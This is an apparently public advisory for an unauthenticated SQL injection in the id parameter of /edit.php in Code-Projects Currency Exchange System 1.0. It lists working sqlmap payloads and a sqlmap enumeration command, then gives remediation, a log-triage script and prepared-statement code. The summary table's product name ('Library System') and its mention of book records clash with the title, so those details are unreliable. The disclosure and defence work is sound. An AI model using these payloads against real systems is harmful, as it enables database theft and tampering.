| Title | Code-Projects Currency Exchange System 1.0 /edit.php SQL Injection |
|---|
| Text |
# Vulnerability Report: Code-Projects Currency Exchange System V1.0 /edit.php SQL Injection
## Summary
| Detail | Content |
| :--- | :--- |
| **Affected Product Name** | Library System |
| **Affected Version** | V1.0 |
| **Vendor Homepage** | `https://code-projects.org/currency-exchange-system-in-php-with-source-code/` |
| **Vulnerability Type** | SQL Injection (SQLi) |
| **Affected File** | `/edit.php` |
| **Affected Parameter** | `id` (GET) |
| **Authentication Required** | None (No login or authorization required to exploit) |
| **Submitter** | yudeshui |
-----
## Description and Impact
### Root Cause
The vulnerability resides in the file `/edit.php`, where the application processes user-supplied input from the **`id`** (ID) parameter. The program **directly concatenates** this parameter value into the SQL query string **without sufficient cleaning, validation, or sanitization**.
### Impact
A successful attack allows an attacker to inject malicious SQL code, thereby manipulating the original database query logic. This can lead to severe consequences, including:
* **Unauthorized Database Access:** Stealing sensitive data such as user information or book records.
* **Data Tampering/Destruction:** Modifying, deleting, or adding records in the database.
* **System Control:** In severe cases, gaining system-level control, posing a serious threat to system security and business continuity.
-----
## Vulnerability Details and PoC
The vulnerability is located in the processing of the `id` parameter within a GET request.
### PoC Payload Examples
The following are examples of SQL injection payloads captured during testing with the `sqlmap` tool:
```
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: id=-3347' OR 4988=4988#
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' OR (SELECT 6462 FROM(SELECT COUNT(*),CONCAT(0x7170626a71,(SELECT (ELT(6462=6462,1))),0x71787a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- rUwE
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 2645 FROM (SELECT(SLEEP(5)))yaLb)-- WyiO
Type: UNION query
Title: MySQL UNION query (NULL) - 11 columns
Payload: id=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170626a71,0x6e6441484a5546536f6e4668426f4b7562425169634347644a4c7a66476e4d486274487a6254674a,0x71787a6271),NULL,NULL,NULL#
---
```
### Sqlmap Screenshot Example (Database Enumeration)
```
sqlmap -u "http://dede:802/edit.php?id=1" --batch --dbs
```
-----
<img width="1364" height="504" alt="Image" src="https://github.com/user-attachments/assets/ca15da0d-e960-4499-b26d-863a8ee417b4" />
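The payloads above all share one trait a defender can key on: the `id` value sent to `/edit.php` is no longer a plain integer. The following triage script is an added example, not part of the report or the Code-Projects application; it scans constructed access-log lines in an Apache-style format (an assumption about the deployment's logging) and reports each request whose decoded `id` fails an integer check. It is deliberately narrow: it only covers the one parameter the report names, and it will flag any legitimate non-numeric `id` too, so review the hits rather than block on them.

```php
<?php
// Added example (not from the report): a defender-side triage script that scans
// web-server access-log lines for requests to /edit.php whose `id` value is not
// a plain integer. The log lines below are constructed for this example; the
// Apache-style format is an assumption about the deployment.
declare(strict_types=1);

$lines = [
    '10.0.0.5 - - [25/Nov/2025:13:40:01 +0000] "GET /edit.php?id=1 HTTP/1.1" 200 1540',
    '10.0.0.9 - - [25/Nov/2025:13:40:07 +0000] "GET /edit.php?id=-3347%27%20OR%204988%3D4988%23 HTTP/1.1" 200 1540',
    '10.0.0.9 - - [25/Nov/2025:13:40:09 +0000] "GET /edit.php?id=1%27%20AND%20%28SELECT%202645%20FROM%20%28SELECT%28SLEEP%285%29%29%29yaLb%29--%20WyiO HTTP/1.1" 200 1540',
    '10.0.0.7 - - [25/Nov/2025:13:41:00 +0000] "GET /index.php HTTP/1.1" 200 880',
];

/**
 * Return one entry per request to /edit.php whose `id` query value is not an
 * integer. Each entry carries the client IP and the decoded value so an analyst
 * can see what was actually sent.
 */
function suspiciousIdRequests(array $lines): array
{
    $hits = [];
    foreach ($lines as $line) {
        // Capture the client address and the request target for /edit.php only.
        if (!preg_match('/^(\S+) .*"GET (\/edit\.php\?[^ "]*) HTTP/', $line, $m)) {
            continue;
        }
        $query = parse_url($m[2], PHP_URL_QUERY);
        parse_str((string) $query, $params);   // parse_str URL-decodes the values
        $id = $params['id'] ?? null;
        // The same integer check the fixed edit.php should apply on input.
        if ($id !== null && filter_var($id, FILTER_VALIDATE_INT) === false) {
            $hits[] = ['ip' => $m[1], 'id' => $id];
        }
    }
    return $hits;
}

foreach (suspiciousIdRequests($lines) as $hit) {
    printf("%s -> id=%s\n", $hit['ip'], $hit['id']);
}
```

Run against the constructed lines, the script reports the two requests from 10.0.0.9 (the boolean-based and time-based payloads from the PoC) and stays silent on the legitimate `id=1` request and the unrelated `/index.php` hit. Extending it to a real log means feeding `file()` output into `suspiciousIdRequests()`; the check itself does not change.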
## ✅ Suggested Repair Measures
To completely resolve this SQL injection issue and enhance overall system security, the following defensive coding practices are strongly recommended:
### 1. Use Prepared Statements and Parameter Binding (Primary Defense)
This is the most effective method against SQL injection. Prepared statements separate the structure of the SQL command from the user-supplied data, ensuring the input is treated as a literal string value and cannot be interpreted as executable SQL code.
* **Action:** Rewrite all database queries in `/edit.php` (and all other files) to use **Prepared Statements** (e.g., using **`mysqli_prepare()`** or **PDO** with parameter binding).
### 2. Strict Input Validation and Filtering
Strictly validate and filter all user input data to ensure it conforms to the expected format, type, and length.
* **Action:** For parameters like `id` which should be numeric, use PHP functions like **`filter_var()`** or **`is_numeric()`** for strict checking.
### 3. Minimize Database User Permissions
Adhere to the Principle of Least Privilege. The database account used by the web application for daily operations should only possess the minimum necessary permissions.
* **Action:** Ensure the application's database user **does not** have administrative privileges (e.g., `DROP`, `ALTER`, or file system access) to limit the impact of a successful breach.
### 4. Regular Security Audits
Establish a routine process for security code reviews and auditing to proactively identify and fix potential vulnerabilities before they are exploited.
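The following PHP fragment is an added example, not code from the report or from the Code-Projects application, showing steps 1 and 2 applied to the `id` parameter of a page like `/edit.php`. The table name `currency`, its columns, the database name and the credentials are all assumptions, since the report does not show the application's schema; the vulnerable concatenation pattern is reproduced only in a comment for contrast.

```php
<?php
// Added example (not the project's code): hardened handling of the `id` GET
// parameter for a page such as /edit.php. Table name, column names, database
// name and credentials are assumptions; the report does not show the schema.
declare(strict_types=1);

// Make mysqli throw on any error instead of returning false silently, so a
// failed prepare() cannot be ignored by accident.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

/**
 * Step 2 of the remediation: accept only a positive integer. Anything else
 * (including the quote-prefixed sqlmap payloads in the report) yields null.
 */
function validateId(?string $raw): ?int
{
    if ($raw === null) {
        return null;
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

/**
 * Step 1 of the remediation: a prepared statement with a bound integer
 * parameter. The query structure is fixed before the value is supplied, so the
 * value can never be parsed as SQL. Requires the mysqlnd driver for get_result().
 */
function loadRecord(mysqli $db, int $id): ?array
{
    $stmt = $db->prepare('SELECT id, name, rate FROM currency WHERE id = ?'); // assumed schema
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// Vulnerable pattern described in the report, shown only for contrast:
//   $q = "SELECT * FROM currency WHERE id = '" . $_GET['id'] . "'";
//   mysqli_query($db, $q);

$id = validateId($_GET['id'] ?? null);
if ($id === null) {
    http_response_code(400);
    exit('Invalid id');
}

// Assumed connection details; use a dedicated low-privilege account (step 3).
$db = new mysqli('localhost', 'app_user', 'app_password', 'currency_db');
$db->set_charset('utf8mb4');

$record = loadRecord($db, $id);
if ($record === null) {
    http_response_code(404);
    exit('Record not found');
}
// ... render the edit form from $record ...
```

Step 3 is a database-side change rather than PHP: the account used here should be granted only what the page needs, for example `SELECT` and `UPDATE` on the application's own tables, and nothing like `DROP`, `ALTER` or `FILE`. With both layers in place, the integer check rejects the reported payloads before any query is built, and the bound parameter means that even a value that slipped past validation would be sent to MySQL as data, not as part of the statement.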
-----
|
|---|
| Source | ⚠️ https://github.com/rassec2/dbcve/issues/12 |
|---|
| Submitter | yudeshui (UID 91129) |
|---|
| Created | 11/25/2025 13:43 (3 Wurɗi ago) |
|---|
| Updated | 12/07/2025 16:18 (12 days later) |
|---|
| Type | Shingilam |
|---|
| VulDB Entry | 334657 [code-projects Currency Exchange System 1.0 /edit.php ID SQL Injection] |
|---|
| Points | 20 |
|---|